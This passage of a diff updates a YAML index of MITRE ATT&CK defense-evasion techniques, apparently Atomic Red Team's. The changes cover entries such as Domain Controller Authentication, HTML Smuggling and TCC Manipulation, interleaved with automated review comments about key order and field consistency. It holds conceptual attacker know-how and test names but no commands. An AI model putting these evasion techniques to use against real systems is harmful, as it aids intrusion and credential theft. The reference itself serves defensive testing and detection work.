+ cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec
+ Kubernetes Attack 2023) They may also give accounts generic, trustworthy names,
+ such as “admin”, “help”, or “root.”(Citation: Invictus IR Cloud Ransomware
+ 2024) Sometimes adversaries may model account names off of those already existing
+ in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).
+ \ \n\nNote that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1656),
+ which describes impersonating specific trusted individuals or organizations,
+ rather than user or service account names. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Menachem Goldstein
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - SaaS
+ - IaaS
+ - Containers
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'User Account: User Account Creation'
type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
+ id: attack-pattern--d349c66e-18e1-4d8b-a2d7-65af7cbd2ba0
+ created: '2024-08-05T21:39:16.274Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1036/010
+ external_id: T1036.010
+ - source_name: Elastic CUBA Ransomware 2022
+ description: Daniel Stepanic, Derek Ditch, Seth Goodwin, Salim Bitam, Andrew
+ Pease. (2022, September 7). CUBA Ransomware Campaign Analysis. Retrieved
+ August 5, 2024.
+ url: https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis
+ - source_name: Invictus IR Cloud Ransomware 2024
+ description: Invictus IR. (2024, January 11). Ransomware in the cloud. Retrieved
+ August 5, 2024.
+ url: https://www.invictus-ir.com/news/ransomware-in-the-cloud
+ - source_name: Huntress MOVEit 2023
+ description: John Hammond. (2023, June 1). MOVEit Transfer Critical Vulnerability
+ CVE-2023-34362 Rapid Response. Retrieved August 5, 2024.
+ url: https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response
+ - source_name: Aquasec Kubernetes Attack 2023
+ description: Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever
+ Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14,
+ 2023.
+ url: https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.001:
+ technique:
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
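Review bot: this hunk is hard to review because the generator changed the key order of every technique object (`modified`, `name`, `description` first; `type`, `id`, `created`, `external_references` last), so the old T1556.001 fields (`x_mitre_platforms`, `id`, `created`, the Dell and TechNet references) appear as deleted here and are re-added, unchanged, in the following `@@ -22795` hunk, interleaved with the genuinely new T1036.010 entry. Please either emit keys in the order the existing file uses or land the reordering as its own commit, so the real content changes (the new sub-technique, the version bumps) stand out on their own.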
@@ -22781,6 +23083,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -22795,22 +23098,42 @@ defense-evasion:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1027.006:
technique:
- modified: '2023-07-14T14:01:41.475Z'
+ modified: '2024-09-12T19:12:13.006Z'
name: HTML Smuggling
description: |-
Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
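Review bot: `x_mitre_permissions_required: - Administrator` for T1556.001 is dropped in this hunk with no replacement, while the only other semantic change is the `x_mitre_version` bump from 2.0 to 2.1. A removed field normally tracks a field retirement upstream, so please confirm the current ATT&CK object really lacks it. The same drop happens for T1556.005 (`User`, `Administrator`) in the `@@ -22967` hunk below, yet T1221 later in this patch keeps its `x_mitre_permissions_required: - User` block as unchanged context, so the index ends up mixing objects with and without the field.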
@@ -22868,13 +23191,12 @@ defense-evasion:
url: https://www.menlosecurity.com/blog/new-attack-alert-duri
- source_name: nccgroup Smuggling HTA 2017
description: Warren, R. (2017, August 8). Smuggling HTA files in Internet
- Explorer/Edge. Retrieved May 20, 2021.
- url: https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/
+ Explorer/Edge. Retrieved September 12, 2024.
+ url: https://www.nccgroup.com/us/research-blog/smuggling-hta-files-in-internet-exploreredge/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027.006
atomic_tests:
- name: HTML Smuggling Remote Payload
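Review bot: the replacement URL for `nccgroup Smuggling HTA 2017`, `https://www.nccgroup.com/us/research-blog/smuggling-hta-files-in-internet-exploreredge/`, carries the slug `internet-exploreredge` where the old path had `internet-explorer-edge`. That may simply be how the new NCC Group blog slugifies the slash in "Explorer/Edge", but it reads like a dropped separator, so please confirm the link resolves before this is merged.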
@@ -22905,37 +23227,7 @@ defense-evasion:
elevation_required: false
T1556.005:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
- type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -22957,6 +23249,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
@@ -22967,23 +23260,50 @@ defense-evasion:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1027.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T19:43:18.873Z'
name: Command Obfuscation
description: |-
Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)
@@ -23024,8 +23344,9 @@ defense-evasion:
url: https://attack.mitre.org/techniques/T1027/010
external_id: T1027.010
- source_name: Twitter Richard WMIC
- description: Ackroyd, R. (2023, March 24). Twitter. Retrieved March 24, 2023.
- url: https://twitter.com/rfackroyd/status/1639136000755765254
+ description: Ackroyd, R. (2023, March 24). Twitter. Retrieved September 12,
+ 2024.
+ url: https://x.com/rfackroyd/status/1639136000755765254
- source_name: Invoke-Obfuscation
description: Bohannon, D. (2016, September 24). Invoke-Obfuscation. Retrieved
March 17, 2023.
@@ -23061,43 +23382,23 @@ defense-evasion:
url: https://redcanary.com/threat-detection-report/techniques/powershell/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1070.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Walker Johnson
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
- created: '2020-01-31T12:35:36.479Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1070.004
- url: https://attack.mitre.org/techniques/T1070/004
- - source_name: Microsoft SDelete July 2016
- url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
- description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
- 8, 2018.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:33:59.107Z'
+ name: 'Indicator Removal on Host: File Deletion'
description: |-
Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include del
on Windows and rm
or unlink
on Linux and macOS.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Indicator Removal on Host: File Deletion'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Walker Johnson
+ x_mitre_deprecated: false
x_mitre_detection: It may be uncommon for events related to benign command-line
functions such as DEL or third-party utilities or tools to be found in an
environment, depending on the user base and how systems are typically used.
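Review bot: `name: 'Indicator Removal on Host: File Deletion'` is carried over unchanged (removed at its old position and re-added under `modified:`) even though the object's `modified` date advances to 2024-10-15, while the neighbouring T1070.009 entry in this same patch is named plainly `Clear Persistence` with no parent prefix. The index now mixes two sub-technique naming conventions ('Parent: Sub' for T1070.004 and T1574.002, bare name for T1070.009, T1036.010 and T1556.001); please pick one, or document that the prefixed names are local overrides the generator deliberately preserves.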
@@ -23108,18 +23409,36 @@ defense-evasion:
network that an adversary could introduce. Some monitoring tools may collect
command-line arguments, but may not capture DEL commands since DEL is a native
function within cmd.exe.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Deletion'
x_mitre_defense_bypassed:
- Host forensic analysis
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
+ created: '2020-01-31T12:35:36.479Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/004
+ external_id: T1070.004
+ - source_name: Microsoft SDelete July 2016
+ description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
+ 8, 2018.
+ url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.004
atomic_tests:
- name: Delete a single file - Windows cmd
@@ -23353,7 +23672,7 @@ defense-evasion:
description: Hanson, R. (2016, September 24). phishery. Retrieved July 21,
2018.
source_name: ryhanson phishery SEPT 2016
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-01-12T18:16:56.176Z'
name: Template Injection
description: |-
Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)
@@ -23383,8 +23702,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1221
atomic_tests:
- name: WINWORD Remote Template Injection
@@ -23409,7 +23726,7 @@ defense-evasion:
name: command_prompt
T1134:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.762Z'
name: Access Token Manipulation
description: |-
Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -23506,7 +23823,6 @@ defense-evasion:
url: https://pentestlab.blog/2017/04/03/token-manipulation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1027.002:
technique:
@@ -23569,7 +23885,6 @@ defense-evasion:
url: https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1027.002
atomic_tests: []
T1564.005:
@@ -23607,7 +23922,7 @@ defense-evasion:
description: 'Kaspersky Lab''s Global Research and Analysis Team. (2015, February).
Equation Group: Questions and Answers. Retrieved December 21, 2015.'
url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-29T15:12:11.024Z'
name: Hidden File System
description: |-
Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)
@@ -23634,8 +23949,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1055.005:
technique:
@@ -23663,7 +23976,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:24:54.198Z'
name: Thread Local Storage
description: "Adversaries may inject malicious code into processes via thread
local storage (TLS) callbacks in order to evade process-based defenses as
@@ -23707,8 +24020,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1622:
technique:
@@ -23763,7 +24074,7 @@ defense-evasion:
Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as IsDebuggerPresent()
and NtQueryInformationProcess()
, or manually checking the BeingDebugged
flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as OutputDebugStringW()
.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-16T15:05:55.918Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Debugger Evasion
x_mitre_detection: |-
@@ -23783,7 +24094,6 @@ defense-evasion:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1622
atomic_tests:
- name: Detect a Debugger Presence in the Machine
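Review bot: `x_mitre_attack_spec_version: 2.1.0` for T1622 survives as unchanged context on the line just above the removed `spec_version: '2.1'`, while T1556.001, T1556.005, T1070.004 and T1027.006 in this same patch are moved to 3.2.0. Either T1622 was generated from an older bundle or the version field is not being refreshed for objects whose key order did not change; please check which, because a single index mixing 2.1.0 and 3.2.0 objects makes the field unreliable for consumers.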
@@ -23845,7 +24155,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1036.006
atomic_tests: []
T1550.002:
@@ -23900,7 +24209,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1550.002
atomic_tests:
- name: Mimikatz Pass the Hash
@@ -24025,7 +24333,7 @@ defense-evasion:
name: powershell
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -24075,7 +24383,6 @@ defense-evasion:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests:
- name: DLL Side-Loading using the Notepad++ GUP.exe binary
@@ -24194,7 +24501,7 @@ defense-evasion:
elevation_required: true
T1216.002:
technique:
- modified: '2024-04-18T23:51:40.464Z'
+ modified: '2024-09-12T19:42:21.547Z'
name: SyncAppvPublishingServer
description: "Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution
of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands.
@@ -24254,8 +24561,8 @@ defense-evasion:
- source_name: 7 - appv
description: Nick Landers. (2017, August 8). Need a signed alternative to
Powershell.exe? SyncAppvPublishingServer in Win10 has got you covered..
- Retrieved February 6, 2024.
- url: https://twitter.com/monoxgas/status/895045566090010624
+ Retrieved September 12, 2024.
+ url: https://x.com/monoxgas/status/895045566090010624
- source_name: 3 - appv
description: 'Raj Chandel. (2022, March 17). Indirect Command Execution: Defense
Evasion (T1202). Retrieved February 6, 2024.'
@@ -24272,37 +24579,18 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1548.006:
technique:
- modified: '2024-04-17T00:02:12.021Z'
+ modified: '2024-10-16T16:54:56.714Z'
name: TCC Manipulation
- description: "Adversaries can manipulate or abuse the Transparency, Consent,
- & Control (TCC) service or database to execute malicious applications with
- elevated permissions. TCC is a Privacy & Security macOS control mechanism
- used to determine if the running process has permission to access the data
- or services protected by TCC, such as screen sharing, camera, microphone,
- or Full Disk Access (FDA).\n\nWhen an application requests to access data
- or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
- located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
- for existing permissions. If permissions do not exist, then the user is prompted
- to grant permission. Once permissions are granted, the database stores the
- application's permissions and will not prompt the user again unless reset.
- For example, when a web browser requests permissions to the user's webcam,
- once granted the web browser may not explicitly prompt the user again.(Citation:
- welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
- abuse the TCC service to execute malicious content. This can be done in various
- ways, including using privileged system applications to execute malicious
- payloads or manipulating the database to grant their application TCC permissions.
- \n\nFor example, adversaries can use Finder, which has FDA permissions by
- default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
- while preventing a user prompt. For a system without System Integrity Protection
- (SIP) enabled, adversaries have also manipulated the operating system to load
- an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
- TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
- inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
- into targeted applications with the desired TCC permissions.\n"
+ description: |+
+ Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+ When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+ Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
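Review bot: the `|+` chomping indicator plus the trailing empty `+` line gives the new `description` two trailing newlines, whereas the removed double-quoted value ended with a single `\n`; if the upstream STIX text ends with one newline, `|` (clip) round-trips it exactly. Separately, "an overwrites file (if connected to an MDM)" reads as a typo of "overrides"; since this is ATT&CK's own text it should stay verbatim here, but it is worth reporting upstream.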
@@ -24310,6 +24598,8 @@ defense-evasion:
phase_name: privilege-escalation
x_mitre_contributors:
- Marina Liang
+ - Wojciech Reguła @_r3ggi
+ - Csaba Fitzl @theevilbit of Kandji
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -24317,7 +24607,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- macOS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Modification'
@@ -24347,7 +24637,6 @@ defense-evasion:
